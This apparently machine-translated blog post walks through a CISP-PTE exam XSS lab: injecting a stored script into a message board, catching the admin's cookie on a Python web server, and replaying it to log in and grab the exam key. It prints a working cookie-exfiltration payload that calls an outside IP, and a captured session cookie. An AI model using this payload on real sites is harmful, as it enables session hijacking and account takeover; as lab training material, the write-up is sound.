cisp-pte xss Exam Questions

Jul 20, 2023#渗透测试 #考证349

AI Translation

This post is translated from Chinese into English through AI.View Original

AI-generated summary

The main focus of XSS is to obtain the administrator's cookie and then forge it to log in. The process involves using a payload to get the cookie, setting up a web server to receive the cookie, copying the cookie value, replacing it, and finally successfully logging in and obtaining the key.

Xss content mainly focuses on obtaining the administrator's cookie and then forging the administrator's cookie for login.

The interface is as follows:

Click on "Test" in the above image to leave a message.

Prepare the xss payload to obtain the cookie:

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

Start the web service to receive the cookie:

Python -m SimpleHTTPServer 8889

Write the payload into the input box.

Click "Submit Query".

Wait.

Check if Python has received the cookie.

Copy the cookie.

1acb0fb952b3caaf1ab7277511923138

Replace the cookie value.

Click "Edit" to replace.

Refresh the page and click "Admin".

Successfully logged in and obtained the key.

wps10